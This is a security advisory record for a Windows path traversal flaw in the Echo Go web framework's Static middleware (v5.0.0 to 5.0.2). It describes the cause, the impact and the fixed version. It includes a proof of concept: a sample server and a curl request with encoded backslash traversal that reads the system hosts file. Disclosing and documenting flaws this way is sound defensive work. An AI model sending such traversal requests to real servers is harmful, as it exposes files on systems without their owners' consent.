GHSA-pgvm-wxw2-hrv9

Source

https://github.com/advisories/GHSA-pgvm-wxw2-hrv9

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/02/GHSA-pgvm-wxw2-hrv9/GHSA-pgvm-wxw2-hrv9.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-pgvm-wxw2-hrv9

Aliases

Published

2026-02-17T18:53:58Z

Modified

2026-02-27T22:07:05Z

Severity

5.3 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N CVSS Calculator

Summary

Echo has a Windows path traversal via backslash in middleware.Static default filesystem

Details

Summary

On Windows, Echo’s middleware.Static using the default filesystem allows path traversal via backslashes, enabling unauthenticated remote file read outside the static root.

Details

In middleware/static.go, the requested path is unescaped and normalized with path.Clean (URL semantics). path.Clean does not treat \ as a path separator, so ..\ sequences remain in the cleaned path. The resulting path is then passed to currentFS.Open(...). When the filesystem is left at the default (nil), Echo uses defaultFS which calls os.Open (echo.go:792). On Windows, os.Open treats \ as a path separator and resolves ..\, allowing traversal outside the static root.

Relevant code: - middleware/static.go (path unescape + path.Clean + currentFS.Open) - echo.go defaultFS.Open → os.Open

This is the same class as CVE-2020-36565 (fixed in v4 by switching to OS-aware cleaning), but in v5 the path.Clean + defaultFS combination reintroduces the Windows backslash traversal.

PoC

Windows only.

Sample code (main.go): ```go package main

import ( "log" "net/http"

    "github.com/labstack/echo/v5"
    "github.com/labstack/echo/v5/middleware"

)

func main() { e := echo.New()

    // Important: use middleware.Static with default filesystem (nil)
    e.Use(middleware.Static("public"))

    e.GET("/healthz", func(c *echo.Context) error {
            return c.String(http.StatusOK, "ok")
    })

    addr := ":1323"
    log.Printf("listening on %s", addr)
    if err := e.Start(addr); err != nil && err != http.ErrServerClosed {
            log.Fatal(err)
    }

} ``` Static file:

public/index.html

(content can be any HTML)

Run: go run .

Verify:

curl http://localhost:1323/index.html curl --path-as-is "http://localhost:1323/..%5c..%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts" Expected: 404

Screenshot: <img width="884" height="689" alt="image" src="https://github.com/user-attachments/assets/acb14d70-2a43-47c1-8927-2f3da491a853" /> <img width="1022" height="162" alt="image" src="https://github.com/user-attachments/assets/f2b92aa2-541e-461d-81a2-8a5907d7a447" />

### Impact Path traversal leading to arbitrary file read outside the static root. Any unauthenticated remote user can read local files that the Echo process has access to on Windows, if middleware.Static is used with the default filesystem.

Database specific

{
    "github_reviewed_at": "2026-02-17T18:53:58Z",
    "nvd_published_at": "2026-02-19T16:27:15Z",
    "severity": "MODERATE",
    "cwe_ids": [
        "CWE-22"
    ],
    "github_reviewed": true
}

References

Affected packages

Go / github.com/labstack/echo/v5

Package

Name: github.com/labstack/echo/v5; View open source insights on deps.dev
Purl: pkg:golang/github.com/labstack/echo/v5

Affected ranges

Type: SEMVER
Events: Introduced

5.0.0

Fixed

5.0.3

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/02/GHSA-pgvm-wxw2-hrv9/GHSA-pgvm-wxw2-hrv9.json"